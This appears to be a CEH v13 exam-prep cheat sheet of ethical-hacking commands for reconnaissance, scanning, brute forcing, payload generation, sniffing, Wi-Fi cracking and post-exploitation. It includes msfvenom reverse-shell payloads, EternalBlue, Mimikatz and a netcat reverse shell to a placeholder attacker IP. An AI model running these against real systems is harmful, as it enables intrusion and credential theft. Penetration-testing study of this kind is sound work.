CEH Command Cheat Sheet (2025 Edition)
Master the Essential Commands for Your CEH v13 Exam and Real-World Ethical Hacking
🔍 Introduction
Whether you’re preparing for the Certified Ethical Hacker (CEH) v13 exam or sharpening your pentesting skills, having the right command at your fingertips can make all the difference.
This CEH Command Cheat Sheet (2025 Edition) gathers the most frequently used commands across the key CEH domains—so you can quickly reference, visualize, and practice them in labs or real-world assessments.
Back2Skills’ approach focuses on visual, beginner-friendly learning, so this guide is also infographic-ready—ideal for transforming into Canva slides or printable study sheets.
🧩 1. Information Gathering & Reconnaissance Commands
| Tool | Purpose | Command Example |
|---|---|---|
| whois | Retrieve domain registration info | whois example.com |
| nslookup | Query DNS records manually | nslookup -type=ANY example.com |
| dig | Detailed DNS lookup | dig example.com ANY +noall +answer |
| theHarvester | Collect emails, hosts, and subdomains | theharvester -d example.com -b google |
| Shodan | Find exposed devices and services | shodan search apache port:80 country:US |
🧠 Pro Tip (CEH Tip):
Know how to perform both passive and active reconnaissance—the exam often tests command syntax differences.
⚙️ 2. Scanning & Enumeration Commands
| Tool | Purpose | Command Example |
|---|---|---|
| nmap | Host discovery and port scanning | nmap -sS -p 1-1024 -T4 example.com |
| rustscan | Fast alternative to Nmap | rustscan -a 192.168.1.0/24 |
| enum4linux | Enumerate Windows shares and users | enum4linux -a 192.168.1.10 |
| snmpwalk | Query SNMP devices | snmpwalk -v2c -c public 192.168.1.1 |
| dnsrecon | DNS record enumeration | dnsrecon -d example.com |
💡 Analogy:
Think of enumeration like “peeling an onion”—each layer (DNS, SNMP, SMB) reveals more internal information.
💥 3. Vulnerability Analysis Commands
| Tool | Purpose | Command Example |
|---|---|---|
| nikto | Web server vulnerability scan | nikto -h http://example.com |
| wpscan | WordPress security scanner | wpscan --url http://example.com |
| nmap | Vulnerability scripts | nmap --script vuln 192.168.1.5 |
| openvas | Network vulnerability scanner | `omp -u admin -w pass -T |
| nessuscli | CLI vulnerability management | nessuscli update --plugins-only |
🧠 CEH Tip:
Understand how to differentiate false positives from actual exploitable vulnerabilities—this concept often appears in CEH MCQs.
🧰 4. System Hacking & Privilege Escalation
| Tool | Purpose | Command Example |
|---|---|---|
| hydra | Brute-force login credentials | hydra -l admin -P passwords.txt ftp://192.168.1.10 |
| john | Password cracking | john --wordlist=rockyou.txt hashes.txt |
| msfvenom | Generate payload | msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe > shell.exe |
| metasploit | Exploitation framework | msfconsole → use exploit/windows/smb/ms17_010_eternalblue |
| hashcat | GPU-based password cracking | hashcat -m 0 hashes.txt rockyou.txt |
⚡ Analogy:
Privilege escalation is like finding the master key inside a building you already entered—it unlocks full control.
🌐 5. Web Application Hacking
| Tool | Purpose | Command Example |
|---|---|---|
| sqlmap | SQL injection automation | sqlmap -u "http://site.com/page.php?id=1" --dump |
| burpsuite | Intercept & modify HTTP traffic | Launch → Proxy → Intercept ON |
| dirb | Discover hidden directories | dirb http://example.com/ /usr/share/wordlists/dirb/common.txt |
| wpscan | WordPress exploit discovery | wpscan --enumerate p |
| curl | Test HTTP requests manually | curl -I http://example.com |
🧠 CEH Tip:
In CEH Practical, manual testing with BurpSuite and SQLMap is expected—memorize common SQLMap flags (--dbs, --tables, --columns, --dump).
📡 6. Sniffing & Spoofing
| Tool | Purpose | Command Example |
|---|---|---|
| tcpdump | Packet capture | tcpdump -i eth0 -w capture.pcap |
| wireshark | GUI network analysis | (open capture.pcap) |
| ettercap | ARP spoofing | ettercap -T -M arp:remote /192.168.1.5/ /192.168.1.10/ |
| arpspoof | Redirect network traffic | arpspoof -i eth0 -t 192.168.1.5 192.168.1.1 |
| macchanger | Change MAC address | macchanger -r eth0 |
⚙️ Analogy:
Packet sniffing is like listening to conversations in a café—you’re not speaking, just observing.
📶 7. Wireless Hacking
| Tool | Purpose | Command Example |
|---|---|---|
| airmon-ng | Enable monitor mode | airmon-ng start wlan0 |
| airodump-ng | Capture Wi-Fi handshakes | airodump-ng wlan0mon |
| aireplay-ng | Deauthenticate clients | aireplay-ng --deauth 10 -a [BSSID] wlan0mon |
| aircrack-ng | Crack WPA2 passwords | aircrack-ng -w wordlist.txt capture.cap |
🧠 CEH Tip:
Expect CEH v13 labs around WPA2 cracking and Evil Twin AP attacks—practice using Kali + compatible adapter.
☁️ 8. Cloud & AI Tools (New for CEH v13)
| Tool | Purpose | Command Example |
|---|---|---|
| ShellGPT | AI-assisted command generation | shellgpt "generate nmap command for all open ports" |
| Tranis AI | Cloud threat simulation | Web interface |
| Malware.AI | Analyze malicious binaries | malwareai scan sample.exe |
| AWS CLI | Cloud service enumeration | aws s3 ls |
| GCP CLI | Enumerate cloud buckets | gcloud storage ls |
💡 Pro Tip:
AI integration is one of CEH v13’s new dimensions—showing you can use AI for automation is a competitive edge.
🧱 9. Post-Exploitation & Reporting
| Tool | Purpose | Command Example |
|---|---|---|
| meterpreter | Post-exploitation shell | getuid, hashdump, screenshot |
| netcat | Reverse shell creation | nc -lvp 4444 / nc [attacker IP] 4444 -e /bin/bash |
| powersploit | PowerShell exploitation scripts | Import-Module PowerSploit |
| Empire | Post-exploitation framework | usemodule credentials/mimikatz |
| Linux privilege check | Find misconfigurations | sudo -l / find / -perm -4000 2>/dev/null |
🧠 CEH Tip:
Always include documentation commands—e.g., history, ifconfig, netstat—for professional reporting in CEH Practical.
📘 10. Documentation & Reporting Commands
| Tool | Purpose | Command Example |
|---|---|---|
| script | Record terminal sessions | script session.log |
| tee | Save command output | `nmap -sV example.com |
| markdown / pandoc | Convert notes to reports | pandoc notes.md -o report.pdf |
| grep / awk | Filter large outputs | grep "open" scan.txt |
| echo / date | Timestamp logs | echo $(date) >> actions.log |
🧾 Analogy:
Documentation is the “ethical” in ethical hacking—it transforms chaos into clarity.
🧠 Key Takeaways
✅ Memorize syntax for Nmap, Hydra, SQLMap, and Metasploit—these appear in most CEH labs.
✅ Combine manual and automated commands for maximum efficiency.
✅ Use ShellGPT to generate and explain commands in context.
✅ Always record your findings—proper documentation is part of the CEH grading.
✅ Practice with platforms like TryHackMe and Hack The Box using these exact commands.